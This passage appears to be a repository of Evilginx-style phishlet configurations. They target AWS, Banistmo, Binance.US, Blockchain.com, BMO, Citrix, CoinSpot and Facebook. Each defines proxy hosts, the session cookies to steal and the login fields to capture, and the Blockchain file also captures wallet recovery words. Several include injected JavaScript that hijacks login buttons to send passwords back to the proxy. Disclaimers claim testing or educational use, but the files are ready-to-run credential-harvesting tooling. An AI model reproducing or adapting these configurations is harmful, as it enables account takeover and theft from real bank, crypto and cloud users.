'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true} 17 | - {phish_sub: 'd1', orig_sub: 'd1', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true} 18 | 19 | - {phish_sub: 'd2eezf66cfmyv', orig_sub: 'd2eezf66cfmyv', domain: 'cloudfront.net', session: true, is_landing: false, auto_filter: true} 20 | 21 | 22 | ## SUBDOMAINS BASED ON GEO LOCATION. 23 | 24 | - {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 25 | - {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 26 | - {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 27 | - {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 28 | - {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 29 | - {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 30 | - {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 31 | - {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 32 | - {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 33 | - {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 34 | - {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 35 | - {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 36 | - {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 37 | - {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 38 | - {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 39 | - {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 40 | - {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 41 | - {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 42 | - {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 43 | - {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 44 | - {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} 45 | 46 | 47 | 48 | 49 | sub_filters: 50 | 51 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazon.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 52 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazonaws.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 53 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'awsstatic.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 54 | - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'cloudfront.net', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 55 | 56 | 57 | auth_tokens: 58 | - domain: '.amazon.com' 59 | keys: ['aws-ubid-main', 'aws-userInfo-signed', '.*,regexp'] 60 | - domain: '.aws.amazon.com' 61 | keys: ['awsm-vid,opt', 'awsccc', '.*,regexp'] 62 | - domain: '.console.aws.amazon.com' 63 | keys: ['noflush_Region', 'noflush_awscnm', '.*,regexp'] 64 | - domain: '.signin.aws.amazon.com' 65 | keys: ['aws-signin-csrf', 'aws-signin-account-info', 'aws-creds', '.*,regexp'] 66 | - domain: 'phd.aws.amazon.com' 67 | keys: ['aws-creds-code-verifier', 'aws-consoleInfo', 'aws-creds', '.*,regexp'] 68 | - domain: 'portal.aws.amazon.com' 69 | keys: ['aws-session-id-fallback,opt', 'aws-session-id', 'JSESSIONID', '.*,regexp'] 70 | - domain: 'signin.aws.amazon.com' 71 | keys: ['JSESSIONID', '.*,regexp'] 72 | 73 | 74 | auth_urls: 75 | - '/console/home' 76 | credentials: 77 | username: 78 | key: 'email' 79 | search: '(.*)' 80 | type: 'post' 81 | password: 82 | key: 'password' 83 | search: '(.*)' 84 | type: 'post' 85 | login: 86 | domain: 'signin.aws.amazon.com' 87 | path: '/signin?redirect_uri=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Ffromtb%3Dtrue%26hashArgs%3D%2523%26isauthcode%3Dtrue%26state%3DhashArgsFromTB_us-east-1_7de15f551561e8cc&client_id=arn%3Aaws%3Asignin%3A%3A%3Aconsole%2Fcanvas&forceMobileApp=0&code_challenge=yjMoqMdgfMR1J8rPfy4CI_50b3PldrJjTsFRPOFWJ9A&code_challenge_method=SHA-256' 88 | -------------------------------------------------------------------------------- /phishlet_examples/banistmo.yaml: -------------------------------------------------------------------------------- 1 | author: '@AN0NUD4Y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'banistmo.com', session: true, is_landing: true} 5 | - {phish_sub: 'personas', orig_sub: 'personas', domain: 'banistmo.com', session: false, is_landing: false} 6 | - {phish_sub: 'portal', orig_sub: 'portal', domain: 'banistmo.com', session: true, is_landing: true} 7 | - {phish_sub: 'bf', orig_sub: 'bf24030jpn.bf', domain: 'dynatrace.com', session: true, is_landing: false} 8 | - {phish_sub: 'api', orig_sub: 'api', domain: 'banistmo.com', session: true, is_landing: false} 9 | - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: true} 10 | - {phish_sub: 'portal', orig_sub: 'portal', domain: 'banistmo.com', session: true, is_landing: false} 11 | 12 | 13 | sub_filters: 14 | # - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '', replace: ';document.location="https://login.YOURDOMA.IN/#/login/e1837f4d-1d0c-49b8-a242-8f653226c137";', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'www.banistmo.com', orig_sub: 'www', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'personas.banistmo.com', orig_sub: 'personas', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | - {triggers_on: 'portal.banistmo.com', orig_sub: 'portal', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']} 18 | - {triggers_on: 'api.banistmo.com', orig_sub: 'api', domain: 'banistmo.com', search: 'api.{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']} 19 | - {triggers_on: 'bf24030jpn.bf.dynatrace.com', orig_sub: 'bf24030jpn.bf', domain: 'dynatrace.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | 22 | 23 | 24 | auth_tokens: 25 | - domain: '.banistmo.com' 26 | keys: ['(.+),regexp'] 27 | - domain: '(.+),regexp' 28 | keys: ['(.+),regexp'] 29 | credentials: 30 | username: 31 | key: 'guid' 32 | search: '(.*)' 33 | type: 'post' 34 | password: 35 | key: 'password' 36 | search: '(.*)' 37 | type: 'post' 38 | login: 39 | domain: 'personas.banistmo.com' 40 | path: '' -------------------------------------------------------------------------------- /phishlet_examples/binanceus.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true} 5 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false} 6 | - {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false} 7 | - {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: false, is_landing: false} 8 | - {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false} 9 | - {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false} 10 | - {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false} 11 | - {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false} 12 | - {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false} 13 | - {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false} 14 | - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false} 15 | 16 | 17 | sub_filters: 18 | - {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 19 | - {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 20 | - {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | - {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 22 | - {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 23 | - {triggers_on: 'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 24 | - {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 25 | - {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 26 | - {triggers_on: 'docs.binance.us', orig_sub: 'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 27 | - {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 28 | - {triggers_on: 'accounts.binance.us', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 29 | 30 | auth_tokens: 31 | - domain: 'accounts.binance.us' 32 | keys: [".*,regexp"] 33 | credentials: 34 | username: 35 | key: 'email' 36 | search: '(.*)' 37 | type: 'post' 38 | password: 39 | key: 'password' 40 | search: '(.*)' 41 | type: 'post' 42 | auth_urls: 43 | - '/mail' 44 | - '/mail/' 45 | login: 46 | domain: 'accounts.binance.us' 47 | path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l' -------------------------------------------------------------------------------- /phishlet_examples/blockchain(Basic).yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'blockchain.com', session: true, is_landing: true} 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'blockchain.com', session: true, is_landing: false} 6 | - {phish_sub: '', orig_sub: '', domain: 'blockchain.info', session: false, is_landing: false} 7 | - {phish_sub: 'api', orig_sub: 'api', domain: 'blockchain.info', session: false, is_landing: false} 8 | # - {phish_sub: 'wallet-helper', orig_sub: 'wallet-helper', domain: 'blockchain.com', session: false, is_landing: false} 9 | # - {phish_sub: '', orig_sub: '', domain: 'blockchain.com', session: false, is_landing: false} 10 | 11 | 12 | sub_filters: 13 | - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'href="https://{hostname}/#/signup"', replace: 'href="https://{hostname}/#/login"', mimes: ['text/html', 'text/javascript']} 14 | - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 18 | - {triggers_on: 'login.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 19 | - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 20 | - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 21 | - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 23 | - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 24 | - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 25 | - {triggers_on: 'www.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 26 | - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 27 | - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 28 | 29 | 30 | auth_tokens: 31 | - domain: '.blockchain.com' 32 | keys: ['.*,regexp'] 33 | - domain: '.blockchain.info' 34 | keys: ['.*,regexp'] 35 | auth_urls: 36 | - '#/home.*' 37 | 38 | credentials: 39 | username: 40 | key: 'guid' 41 | search: '(.*)' 42 | type: 'post' 43 | password: 44 | key: 'password' 45 | search: '(.*)' 46 | type: 'post' 47 | custom: 48 | - key: 'BackupWords' 49 | search: '(.*)' 50 | type: 'post' 51 | login: 52 | domain: 'www.blockchain.com' 53 | path: '/' 54 | 55 | # To insert the wallet id directly from link 56 | # https://login.blockchain.com/#/login/dxxxxxxa-xxx8-xx4x-xxfa-dxxxx9xxx76ce 57 | js_inject: 58 | - trigger_domains: ["login.blockchain.com"] 59 | trigger_paths: ["/"] 60 | script: | 61 | function onclickListener(){ 62 | var submit = document.querySelectorAll('button[type=submit]')[0]; 63 | submit.setAttribute("onclick", "sendPass()"); 64 | return; 65 | } 66 | function sendPass(){ 67 | var walletID = document.getElementsByName("guid")[0].value; 68 | var password = document.getElementsByName("password")[0].value; 69 | var xhr = new XMLHttpRequest(); 70 | xhr.open("POST", '/', true); 71 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 72 | xhr.send("guid="+encodeURIComponent(walletID)+""+" password="+encodeURIComponent(password)); 73 | return; 74 | } 75 | setTimeout(function(){ onclickListener(); }, 100); 76 | -------------------------------------------------------------------------------- /phishlet_examples/bmomobile.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | 5 | author: '@testcase0x' 6 | min_ver: '2.3.0' 7 | proxy_hosts: 8 | - {phish_sub: 'm2', orig_sub: 'm2', domain: 'bmo.com', session: false, is_landing: true} 9 | - {phish_sub: 'mobile2', orig_sub: 'mobile2', domain: 'bmo.com', session: true, is_landing: false} 10 | sub_filters: 11 | - {triggers_on: 'mobile2.bmo.com', orig_sub: 'mobile2', domain: 'bmo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 12 | auth_tokens: 13 | - domain: '.bmo.com/' 14 | keys: ['.*,regexp'] 15 | credentials: 16 | username: 17 | key: 'FBC_Number' 18 | search: '(.*)' 19 | type: 'post' 20 | password: 21 | key: 'FBC_Password' 22 | search: '(.*)' 23 | type: 'post' 24 | login: 25 | domain: 'm2.bmo.com' 26 | path: '/BMOMobile/apps/services/www/BMOMobileBanking/mobilewebapp/default/BMOMobileBanking.html' 27 | 28 | js_inject: 29 | - trigger_domains: ["mobile2.bmo.com"] 30 | trigger_paths: ["/BMOMobile/BMOMobileBanking.html","/BMOMobile/BMOMobileBanking.html#/login/auth","/BMOMobile/apps/services/www"] 31 | trigger_params: [] 32 | script: | 33 | function lp(){ 34 | var submit = document.querySelectorAll('button')[1]; 35 | submit.addEventListener("click", sendPass); 36 | return; 37 | } 38 | function sendPass(){ 39 | var credential = document.getElementById("mat-input-0").value; 40 | var password = document.getElementById("mat-input-1").value; 41 | var xhr = new XMLHttpRequest(); 42 | xhr.open("POST", '/accounts/login/ajax/', true); 43 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 44 | xhr.send("FBC_Password="+encodeURIComponent(password) + "&FBC_Number="+encodeURIComponent(credential)); 45 | return; 46 | } 47 | setInterval(function(){ lp(); }, 500); -------------------------------------------------------------------------------- /phishlet_examples/citrix.yaml: -------------------------------------------------------------------------------- 1 | name: 'Citrix Portal' 2 | author: '@424f424f' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true} 6 | sub_filters: 7 | - {triggers_on: 'domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 8 | auth_tokens: 9 | - domain: 'domainhere' 10 | keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount'] 11 | credentials: 12 | username: 13 | key: 'login' 14 | search: '(.*)' 15 | type: 'post' 16 | password: 17 | key: 'passwd' 18 | search: '(.*)' 19 | type: 'post' 20 | login: 21 | domain: 'subdomainhere.domainhere' 22 | path: '/vpn/index.html' 23 | -------------------------------------------------------------------------------- /phishlet_examples/coinspot.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | author: '@AN0NUD4Y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'coinspot.com.au', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false} 9 | 10 | 11 | sub_filters: 12 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'window.location.href', replace: '"https://www.coinspot.com.au/login"', mimes: ['text/html', 'application/javascript', 'application/x-javascript', 'text/javascript']} 13 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'window.location.href', replace: '"https://www.coinspot.com.au/login"', mimes: ['text/html', 'application/javascript', 'application/x-javascript', 'text/javascript']} 14 | 15 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 16 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 17 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'coinspot.com.au', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 18 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 19 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 20 | - {triggers_on: 'www.coinspot.com.au', orig_sub: 'www', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 21 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 22 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 23 | - {triggers_on: 'www.gstatic.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 24 | 25 | auth_tokens: 26 | - domain: '.coinspot.com.au' 27 | keys: ['.*,regexp'] 28 | credentials: 29 | username: 30 | key: 'login' 31 | search: '(.*)' 32 | type: 'post' 33 | password: 34 | key: 'password' 35 | search: '(.*)' 36 | type: 'post' 37 | login: 38 | domain: 'www.coinspot.com.au' 39 | path: '/' -------------------------------------------------------------------------------- /phishlet_examples/facebook-d.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} 6 | - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 11 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 12 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} 13 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 14 | - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 15 | - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} 16 | 17 | auth_tokens: 18 | - domain: '.facebook.com' 19 | keys: ['c_user','xs','sb'] 20 | credentials: 21 | username: 22 | key: 'email' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'unenc_password' 27 | search: '(.*)' 28 | type: 'post' 29 | custom: 30 | - key: 'UserAgent' 31 | search: '(.*)' 32 | type: 'post' 33 | - key: 'Browser' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'Engine' 37 | search: '(.*)' 38 | type: 'post' 39 | - key: 'Platform' 40 | search: '(.*)' 41 | type: 'post' 42 | 43 | 44 | login: 45 | domain: 'www.facebook.com' 46 | path: '/login.php' 47 | 48 | js_inject: 49 | - trigger_domains: ["www.facebook.com"] 50 | trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"] 51 | trigger_params: [] 52 | script: | 53 | function onclickListener(){ 54 | var submit = document.querySelectorAll('button[type=submit]')[0]; 55 | var submitmobile = document.getElementById('u_0_5'); 56 | var submitbuttonmobile = document.querySelectorAll('button[type=button]')[0]; 57 | submit.setAttribute("onclick", "sendPass()"); 58 | submitmobile.setAttribute("onclick", "sendPass()"); 59 | submitbuttonmobile.setAttribute("onclick", "sendPass()"); 60 | return; 61 | } 62 | function sendPass(){ 63 | var password = document.getElementsByName("pass")[0].value; 64 | var xhr = new XMLHttpRequest(); 65 | xhr.open("POST", '/login/device-based/regular/login/', true); 66 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 67 | xhr.send("unenc_password="+encodeURIComponent(password)); 68 | var xhr1 = new XMLHttpRequest(); 69 | var useragent = navigator.userAgent; 70 | xhr1.open("POST", '/', true); 71 | xhr1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 72 | var xhr2 = new XMLHttpRequest(); 73 | var browser = navigator.appName; 74 | 